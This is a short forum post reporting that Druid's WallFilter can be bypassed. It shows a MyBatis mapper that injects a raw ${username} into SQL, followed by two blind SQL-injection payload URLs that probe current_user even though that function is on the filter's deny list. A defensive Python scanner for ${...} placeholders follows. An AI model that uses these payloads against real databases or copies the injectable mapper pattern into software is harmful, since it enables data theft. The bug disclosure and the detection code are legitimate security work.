druid Bypass WallFilter

kmb7vmvb posted 4 months ago in Druid

Mybatis UserMapping.xml

<select id="queryUserByName" resultMap="BaseResultMap" parameterType="String">
    SELECT id, username, password
    FROM users where username = "${username}"
</select>

You can see http://test.com/queryUserByName?username=aaaa " or length(current_user) = "14
MySQL threw an exception: nested exception is org.apache.ibatis.exceptions.TooManyResultsException
It means the query succeeded but returned too many results.

Then, you can see queryUserByName?username=aaaa" or ascii(substr(current_user,1,1)) = "114

The key function "current_user" exists in the file /META-INF/druid/wall/mysql/deny-function.txt
So I think this is a bug
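
A static check for the root cause in the mapper above, as an added example that is not part of the original post or of Druid or MyBatis: it scans mapper XML for ${...} placeholders, which MyBatis substitutes into the SQL text, unlike #{...}, which is bound as a PreparedStatement parameter. The mapper namespace, the second statement and the function name find_raw_substitutions are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# MyBatis elements whose text becomes SQL.
STATEMENT_TAGS = {"select", "insert", "update", "delete", "sql"}
# ${name} is textual substitution; #{name} is a bound PreparedStatement parameter.
RAW_SUBSTITUTION = re.compile(r"\$\{\s*([^}]+?)\s*\}")

# Constructed sample: the page's statement plus a bound-parameter variant.
SAMPLE_MAPPER = """
<mapper namespace="example.UserMapper">
    <select id="queryUserByName" resultMap="BaseResultMap" parameterType="String">
        SELECT id, username, password
        FROM users where username = "${username}"
    </select>
    <select id="queryUserByNameBound" resultMap="BaseResultMap" parameterType="String">
        SELECT id, username, password
        FROM users
        <where>
            <if test="username != null">username = #{username}</if>
        </where>
    </select>
</mapper>
"""


def find_raw_substitutions(mapper_xml):
    """Return (statement id, parameter name) for every ${...} inside a statement."""
    findings = []
    root = ET.fromstring(mapper_xml)
    for element in root.iter():
        if element.tag not in STATEMENT_TAGS:
            continue
        # itertext() also walks dynamic-SQL children such as <if> and <where>.
        sql_text = "".join(element.itertext())
        for match in RAW_SUBSTITUTION.finditer(sql_text):
            findings.append((element.get("id"), match.group(1)))
    return findings


if __name__ == "__main__":
    for statement_id, name in find_raw_substitutions(SAMPLE_MAPPER):
        print(f"{statement_id}: ${{{name}}} is concatenated into the SQL; "
              f"bind it as #{{{name}}} instead")
```

Run over a project's mapper files, any finding marks a statement whose safety depends entirely on a filter such as WallFilter rather than on parameter binding.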

fjaof16o 2#

I am a newcomer. I am interested in this issue. Please guide me.
